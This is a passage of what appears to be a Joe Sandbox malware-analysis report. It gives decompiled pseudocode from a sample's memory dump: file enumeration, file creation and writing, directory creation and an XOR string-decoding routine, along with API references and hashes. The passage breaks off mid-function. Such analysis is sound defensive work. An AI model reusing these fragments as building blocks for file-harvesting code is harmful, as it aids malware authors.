										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x4c7560 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E004394C7();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x4c7560 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E00429333(GetLastError());
											 *( *((intOrPtr*)(0x4c7560 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x4c7560 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E004374F2( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E004396D6(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E00433413(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E00429333(_t271);
							 *( *((intOrPtr*)(0x4c7560 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x4c7560 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E00429369(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x4c7560 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00429333(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E004394C7();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00429356(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E00429369(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E00429356(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00429369(_t289)));
				}
			}

0x00439831
0x00439835
0x00439836
0x00439836
0x00439836
0x00439838
0x0043983b
0x0043983e
0x00439859
0x0043985e
0x00439861
0x00439863
0x00439865
0x00439884
0x0043988b
0x00439892
0x00439895
0x004398a1
0x004398a4
0x004398ac
0x004398ad
0x004398b0
0x004398b0
0x004398b2
0x004398b7
0x004398b9
0x004398bc
0x004398c4
0x004398c7
0x00439934
0x00439935
0x0043993b
0x0043993d
0x00439986
0x00439989
0x00439992
0x00439995
0x00439998
0x0043999a
0x0043999a
0x0043999a
0x0043998b
0x0043998e
0x0043998e
0x0043999f
0x004399a2
0x004399ae
0x004399b3
0x004399bf
0x004399c9
0x004399cd
0x004399d7
0x004399da
0x004399e5
0x004399ea
0x00439a09
0x00439a0c
0x00439a10
0x00439a11
0x00439a17
0x00439a1c
0x00439a1f
0x00439a21
0x00439a23
0x00439a28
0x00439a2a
0x00439a2c
0x00439a2f
0x00439a31
0x00439a4b
0x00439a6f
0x00439a73
0x00439a77
0x00439a79
0x00439a7d
0x00439a7f
0x00439a89
0x00439a8c
0x00439a93
0x00439a93
0x00439a93
0x00439a93
0x00439a7d
0x00439a98
0x00439aa4
0x00439aa6
0x00439b31
0x00439b31
0x00000000
0x00439aac
0x00439aac
0x00439ab0
0x00000000
0x00000000
0x00439ab5
0x00439ac7
0x00439acf
0x00439ad2
0x00439ad3
0x00439ad6
0x00439add
0x00439ae2
0x00439ae5
0x00439b19
0x00439b23
0x00439b23
0x00439b2d
0x00000000
0x00439b2d
0x00439aee
0x00439b07
0x00439b0e
0x0043992e
0x00000000
0x0043992e
0x00439aa6
0x00439a33
0x00000000
0x004399ec
0x004399f3
0x004399f6
0x004399f8
0x00000000
0x00000000
0x004399fa
0x004399fc
0x004399fc
0x00000000
0x00439a02
0x004399ea
0x00439945
0x00439948
0x00439963
0x00439968
0x0043996e
0x00439970
0x0043997b
0x0043997b
0x00000000
0x00439970
0x004398c9
0x004398d0
0x004398d2
0x00439909
0x00439909
0x00439913
0x00439916
0x0043991d
0x0043991d
0x0043991d
0x00439929
0x00000000
0x00439929
0x004398d4
0x004398d8
0x00000000
0x00000000
0x004398da
0x004398e9
0x004398ee
0x004398f1
0x004398f2
0x004398f5
0x004398f5
0x004398fc
0x004398fe
0x00439901
0x00439904
0x00439907
0x00000000
0x00000000
0x00000000
0x00439867
0x0043986c
0x0043986f
0x00439876
0x00000000
0x00439876
0x00439840
0x00439840
0x00439845
0x00439845
0x0043984b
0x0043984d
0x00000000
0x00439852

APIs

Part of subcall function 004394C7: CreateFileW.KERNELBASE(00000000,00000000,?,004398B7,?,?,00000000,?,004398B7,00000000,0000000C), ref: 004394E4

GetLastError.KERNEL32 ref: 00439922
__dosmaperr.LIBCMT ref: 00439929
GetFileType.KERNEL32(00000000), ref: 00439935
GetLastError.KERNEL32 ref: 0043993F
__dosmaperr.LIBCMT ref: 00439948
CloseHandle.KERNEL32(00000000), ref: 00439968
CloseHandle.KERNEL32(?), ref: 00439AB5
GetLastError.KERNEL32 ref: 00439AE7
__dosmaperr.LIBCMT ref: 00439AEE

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 47ee598a024ddfcb03d8d51f78a96ccda7b1919aa7b14ae15dd3ab4d8bf4b623
Instruction ID: 1b0c0d68387fce7aa16790a08feda7f070bdec9addd86924b17f62cd2e4b8cb5
Opcode Fuzzy Hash: 47ee598a024ddfcb03d8d51f78a96ccda7b1919aa7b14ae15dd3ab4d8bf4b623
Instruction Fuzzy Hash: 86A14572A041589FCF19EF68DC91BAE3BA0AF0E324F14115EE811AB391D7789D12CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402F60 Relevance: 12.1, APIs: 8, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00402F60(void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v140;
				char _v416;
				signed int _v460;
				void* _v461;
				signed int _v462;
				signed int _v463;
				signed char _v464;
				signed int _v465;
				signed char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v476;
				void* _v480;
				char _v484;
				char _v488;
				char _v492;
				void* __ebx;
				signed int _t57;
				void* _t64;
				char _t67;
				signed int _t83;
				void* _t126;
				void* _t127;
				void* _t132;
				signed int _t135;
				void* _t137;
				void* _t141;

				_t141 = __eflags;
				_t127 = __esi;
				_t126 = __edi;
				_t89 = _t132;
				_t135 = (_t132 - 0x00000008 & 0xfffffff0) + 4;
				_v8 =  *((intOrPtr*)(_t132 + 4));
				_t130 = _t135;
				_t57 =  *0x4c61a4; // 0x8656a166
				_v16 = _t57 ^ _t135;
				_v484 =  &_v460;
				_v462 = 0;
				_v463 = 0;
				_v464 = 0;
				_t64 = E004062A0(_t141,  &_v88,  *((intOrPtr*)(_t132 + 0xc)), E0041B420(E00405020( &_v140, _v463 & 0x000000ff, _v464 & 0x000000ff, _v463 & 0x000000ff, _v462 & 0x000000ff), _v463 & 0x000000ff));
				_t137 = _t135 - 0x1e0 + 0xc;
				_v488 = E0041AF80(_t64);
				_t67 = E00407000( &_v467, _t141,  &_v488,  &_v484); // executed
				_v476 = _t67;
				if(_v476 != 0xffffffff) {
					_v480 = 0;
				} else {
					_v480 = 1;
				}
				_t121 = _v480;
				_v465 = _v480;
				E00416980( &_v88);
				_t69 = _v465 & 0x000000ff;
				if((_v465 & 0x000000ff) == 0) {
					do {
						E00415310( &_v40, __eflags,  &_v416);
						E00406210( &_v64, E004062A0(__eflags,  &_v112,  *((intOrPtr*)(_t89 + 0xc)), "\\"),  &_v40);
						_t137 = _t137 + 0x18;
						E00416980( &_v112);
						__eflags = _v460 & 0x00000010;
						if((_v460 & 0x00000010) == 0) {
							_v461 = 0;
						} else {
							_v461 = 1;
						}
						_v466 = _v461;
						__eflags =  *((char*)(E00417250( &_v40, 0))) - 0x2e;
						if(__eflags != 0) {
							__eflags = _v466 & 0x000000ff;
							if(__eflags == 0) {
								E00422070( *((intOrPtr*)(_t89 + 8)),  &_v64);
								E00416980( &_v64);
								E00416980( &_v40);
							} else {
								E00416980( &_v64);
								E00416980( &_v40);
							}
						} else {
							E00416980( &_v64);
							E00416980( &_v40);
						}
						_v492 =  &_v460;
						_t83 = E004066F0( &_v468, __eflags,  &_v476,  &_v492); // executed
						__eflags = _t83;
					} while (__eflags != 0);
					_t121 =  &_v476;
					_t69 = E004064C0( &_v469, __eflags,  &_v476); // executed
					goto L15;
				} else {
					L15:
					return E00424900(_t69, _t89, _v16 ^ _t130, _t121, _t126, _t127);
				}
			}

0x00402f60
0x00402f60
0x00402f60
0x00402f61
0x00402f69
0x00402f70
0x00402f74
0x00402f7c
0x00402f83
0x00402f8c
0x00402f94
0x00402f9c
0x00402fa4
0x00402fda
0x00402fdf
0x00402fe9
0x00403003
0x00403008
0x00403015
0x00403023
0x00403017
0x00403017
0x00403017
0x0040302d
0x00403033
0x0040303c
0x00403041
0x0040304a
0x00403051
0x0040305b
0x0040307e
0x00403083
0x00403089
0x00403094
0x00403097
0x004030a2
0x00403099
0x00403099
0x00403099
0x004030af
0x004030c2
0x004030c5
0x004030e0
0x004030e2
0x004030fd
0x00403105
0x0040310d
0x004030e4
0x004030e7
0x004030ef
0x004030ef
0x004030c7
0x004030ca
0x004030d2
0x004030d2
0x00403118
0x00403132
0x00403137
0x00403137
0x0040313f
0x0040314c
0x00000000
0x0040304c
0x00403151
0x00403161
0x00403161

APIs

Part of subcall function 004062A0: char_traits.LIBCPMTD ref: 004062B5

Part of subcall function 00407000: FindFirstFileA.KERNELBASE(?,?), ref: 0040703B

task.LIBCPMTD ref: 0040303C
task.LIBCPMTD ref: 00403089
task.LIBCPMTD ref: 004030CA
task.LIBCPMTD ref: 004030D2
task.LIBCPMTD ref: 004030E7
task.LIBCPMTD ref: 004030EF
task.LIBCPMTD ref: 00403105
task.LIBCPMTD ref: 0040310D

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$FileFindFirstchar_traits
String ID:
API String ID: 2180524113-0
Opcode ID: 6c2495f2315da6334a61f3534b133ff809d694a0f1b528dec9db7b1fb2f8aad6
Instruction ID: d4b2d6d34ce9ffc6de42212522fb51f6cfd450473e43954f096c755978eed181
Opcode Fuzzy Hash: 6c2495f2315da6334a61f3534b133ff809d694a0f1b528dec9db7b1fb2f8aad6
Instruction Fuzzy Hash: C051CF71D452189BDB15EB61DC91AEEBBB8AF14304F0041EFE40A661C2EA399B88CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00402E60 Relevance: 6.1, APIs: 4, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00402E60(void* __eflags, char _a4, char _a28) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _t51;
				void* _t56;

				_v20 = 0;
				_v24 = 0x80;
				_v28 = 2;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0xc0000000;
				_v44 = E0041AF80( &_a4);
				_t51 = E00406F50( &_v9, __eflags,  &_v44,  &_v40,  &_v36,  &_v32,  &_v28,  &_v24,  &_v20); // executed
				_v16 = _t51;
				if(_v16 != 0xffffffff) {
					_v48 = 0;
					_v52 =  &_v64;
					_v56 = E00420EE0( &_a28);
					_v60 = E0041AF80( &_a28);
					_t56 = E004067E0( &_v10, __eflags,  &_v16,  &_v60,  &_v56,  &_v52,  &_v48); // executed
					__eflags = _t56;
					if(__eflags == 0) {
						_v5 = 0;
					} else {
						_v5 = 1;
					}
					_v7 = _v5;
					E00406460( &_v11, __eflags,  &_v16); // executed
					_v8 = _v7;
					E00416980( &_a4);
					E00416980( &_a28); // executed
					return _v8;
				}
				_v6 = 0;
				E00416980( &_a4);
				E00416980( &_a28);
				return _v6;
			}

0x00402e66
0x00402e6d
0x00402e74
0x00402e7b
0x00402e82
0x00402e89
0x00402e98
0x00402eba
0x00402ebf
0x00402ec6
0x00402ee1
0x00402eeb
0x00402ef6
0x00402f01
0x00402f1b
0x00402f20
0x00402f22
0x00402f2a
0x00402f24
0x00402f24
0x00402f24
0x00402f31
0x00402f3b
0x00402f43
0x00402f49
0x00402f51
0x00000000
0x00402f56
0x00402ec8
0x00402ecf
0x00402ed7
0x00000000

APIs

Part of subcall function 00406F50: CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00402EBF), ref: 00406FF4

task.LIBCPMTD ref: 00402ECF
task.LIBCPMTD ref: 00402ED7
task.LIBCPMTD ref: 00402F49
task.LIBCPMTD ref: 00402F51

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$CreateFile
String ID:
API String ID: 4026579400-0
Opcode ID: e077475a0bdd1d217f7dfaec0cba1daf583d09cb61324eab440a461b31395a3f
Instruction ID: 100598345346231ee0ac2b5274c28d190601c1181287c5824d487240bdf161ab
Opcode Fuzzy Hash: e077475a0bdd1d217f7dfaec0cba1daf583d09cb61324eab440a461b31395a3f
Instruction Fuzzy Hash: 65315CB2C0014CAACF05DFE0C851AEEBB78AF14308F04826EE55237181EB785749CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004022A0 Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004022A0(void* __ebx, void* __edi, intOrPtr _a4, char _a8, char _a32) {
				signed int _v8;
				char _v32;
				signed int _v36;
				void* __esi;
				signed int _t25;
				signed char* _t35;
				signed char* _t39;
				void* _t45;
				void* _t64;
				signed int _t67;

				_t64 = __edi;
				_t45 = __ebx;
				_t25 =  *0x4c61a4; // 0x8656a166
				_v8 = _t25 ^ _t67;
				E004157E0( &_v32);
				_v36 = 0;
				while(_v36 < E00420EE0( &_a8)) {
					_t35 = E00417250( &_a8, _v36);
					_t39 = E00417250( &_a32, _v36 % E00420EE0( &_a32));
					_t61 =  *_t39;
					_t65 =  *_t35 ^  *_t39;
					E00418040( &_v32, 0xff - ( *_t35 ^  *_t39)); // executed
					_v36 = _v36 + 1;
				}
				E004151C0(_a4,  &_v32);
				E00416980( &_v32);
				E00416980( &_a8); // executed
				E00416980( &_a32);
				return E00424900(_a4, _t45, _v8 ^ _t67, _t61, _t64, _t65);
			}

0x004022a0
0x004022a0
0x004022a6
0x004022ad
0x004022b4
0x004022b9
0x004022cb
0x004022df
0x004022fc
0x00402301
0x00402304
0x00402311
0x004022c8
0x004022c8
0x0040231f
0x00402327
0x0040232f
0x00402337
0x0040234d

APIs

Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00402311
task.LIBCPMTD ref: 00402327
task.LIBCPMTD ref: 0040232F
task.LIBCPMTD ref: 00402337

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$Concurrency::task_continuation_context::task_continuation_context
String ID:
API String ID: 600748487-0
Opcode ID: 11f07c3e16d1c088641bf9ce880b939a0038ed9d3b00aea5575c1f4dae568fd7
Instruction ID: cc6ac0ad72089c9c196d30fff1abdc1973a20187ed0794c59e3d6388ce01125e
Opcode Fuzzy Hash: 11f07c3e16d1c088641bf9ce880b939a0038ed9d3b00aea5575c1f4dae568fd7
Instruction Fuzzy Hash: 60114F7191011C9BCB04EFA5D8529EE77B4EF58308F41426EE81A67192DF386E45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004334D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004334D6(void* __ecx) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t9 =  *0x4c7540; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0x4c7540 = _t9;
				}
				_t10 = E00436150(_t9, 4); // executed
				 *0x4c7544 = _t10;
				E00432BD6(0);
				if( *0x4c7544 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0x4c6330;
					do {
						_t1 = _t31 + 0x20; // 0x4c6350
						E00433036(__eflags, _t1, 0xfa0, 0);
						_t14 =  *0x4c7544; // 0x0
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0x4c7560 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x38));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0x4c63d8;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0x4c7540 = _t30;
					 *0x4c7544 = E00436150(_t30, 4);
					_t21 = E00432BD6(0);
					if( *0x4c7544 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x004334d6
0x004334de
0x004334e1
0x004334ea
0x004334ec
0x004334ee
0x00000000
0x004334ee
0x004334e3
0x004334e3
0x004334f0
0x004334f0
0x004334f0
0x004334f8
0x004334ff
0x00433504
0x00433513
0x00433540
0x00433541
0x00433541
0x00433543
0x00433548
0x0043354f
0x00433553
0x00433558
0x00433562
0x00433574
0x00433578
0x0043357b
0x00433586
0x00433586
0x0043357d
0x0043357d
0x00433580
0x00000000
0x00433582
0x00433582
0x00433584
0x00000000
0x00000000
0x00433584
0x00433580
0x0043358d
0x00433590
0x00433591
0x00433591
0x0043359a
0x0043359d
0x00433515
0x00433518
0x00433525
0x0043352a
0x00433539
0x00000000
0x0043353b
0x0043353f
0x0043353f
0x00433539

APIs

_free.LIBCMT ref: 00433504
_free.LIBCMT ref: 0043352A

Strings

0cL, xrefs: 00433543

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free
String ID: 0cL
API String ID: 269201875-3935308125
Opcode ID: 425e36a23307e16dc1a2f38c5643967667785e8ea2e9763878cd7a686b60e32a
Instruction ID: 5f4dae036c717e59a0033947497de2dc49ecfb4801ef2124556c69d49c97ffa5
Opcode Fuzzy Hash: 425e36a23307e16dc1a2f38c5643967667785e8ea2e9763878cd7a686b60e32a
Instruction Fuzzy Hash: 4A11E271A842207BDB709F29AC01F563394A718735F24267BF624CB7E0E37CE9424A4C

Uniqueness

Uniqueness Score: -1.00%

Function 004332D0 Relevance: 4.5, APIs: 3, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004332D0(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 != 0) {
					return 0;
				} else {
					return E00429333(GetLastError()) | 0xffffffff;
				}
			}

0x004332da
0x004332e2
0x004332f9
0x004332e4
0x004332f5
0x004332f5

APIs

CreateDirectoryW.KERNELBASE(0042D893,00000000,?,0042D893,?), ref: 004332DA
GetLastError.KERNEL32(?,0042D893,?), ref: 004332E4
__dosmaperr.LIBCMT ref: 004332EB

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: CreateDirectoryErrorLast__dosmaperr
String ID:
API String ID: 42539052-0
Opcode ID: 56dd37f504d3093009033e98b16bfc3015d920b0609cbad0a53e13edc06ecbd4
Instruction ID: 76e6a8e4a2da7d66699e469d7b43900d9e38c2c6b7c5e8c1d0aefec1635c0fe7
Opcode Fuzzy Hash: 56dd37f504d3093009033e98b16bfc3015d920b0609cbad0a53e13edc06ecbd4
Instruction Fuzzy Hash: 87D0A93224420827DB102BB2BC09B0B3B1CAB82374F104222F62CC50E0DA39C9A08188

Uniqueness

Uniqueness Score: -1.00%

Function 00439780 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00439780(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t22;
				void* _t25;
				signed int _t28;
				signed int _t29;

				_t25 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(E0042D76C(_t25, _a12,  &_v28, E0042D789(__edx, __eflags)) == 0) {
					_push(_a28);
					_t22 = E0043980E(_t25, __eflags, _a4, _a8, _v20, _a16, _a20, _a24); // executed
					_t29 = _t22;
				} else {
					_t29 = _t28 | 0xffffffff;
				}
				if(_v8 != 0) {
					E00432BD6(_v20);
				}
				return _t29;
			}

0x00439780
0x0043978b
0x0043978e
0x00439791
0x00439794
0x00439797
0x0043979a
0x004397b4
0x004397bb
0x004397d0
0x004397d8
0x004397b6
0x004397b6
0x004397b6
0x004397de
0x004397e3
0x004397e8
0x004397ed

APIs

_free.LIBCMT ref: 004397E3

Strings

y=C, xrefs: 00439782

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free
String ID: y=C
API String ID: 269201875-559731289
Opcode ID: 268e99967372a37c1011a26b007b3de3f61582c0529f4a63226af0f5497d9909
Instruction ID: 3d70bebd1624fa92e9592f200ec8825dd721b6f2e21aed7e7644c70bca6f3a1f
Opcode Fuzzy Hash: 268e99967372a37c1011a26b007b3de3f61582c0529f4a63226af0f5497d9909
Instruction Fuzzy Hash: 45017C72C00119BFCF01AFA88C019EEBFB5BF08300F14016AF914E2291E7758A20DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A200 Relevance: 3.1, APIs: 2, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040A200(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, char _a8, signed int _a12) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _t55;
				char _t62;

				_v12 = __ecx;
				_v8 = _v12;
				_t5 = _v8 + 0x10; // 0xec8b55cc
				_v16 =  *_t5;
				_t55 = E00421040(_v12, __eflags);
				_t114 = _t55 - _v16 - _a4;
				if(_t55 - _v16 < _a4) {
					E0041A4E0();
				}
				_v24 = _v16 + _a4;
				_t14 = _v8 + 0x14; // 0x890cec83
				_v32 =  *_t14;
				_v28 = E004186C0(_v12, _v24);
				_v40 = E00419380(_v12);
				_t62 = E0041A610(_v40, _t114, _v28 + 1); // executed
				_v20 = _t62;
				E00416AC0(_t62, _v8);
				 *((intOrPtr*)(_v8 + 0x10)) = _v24;
				 *((intOrPtr*)(_v8 + 0x14)) = _v28;
				_v44 = E004075F0(_v20);
				if(_v32 < 0x10) {
					E00417A90( &_a8, _v44, _v8, _v16, _a12 & 0x000000ff);
					E00407400(_v8, _v8,  &_v20);
				} else {
					_v36 =  *_v8;
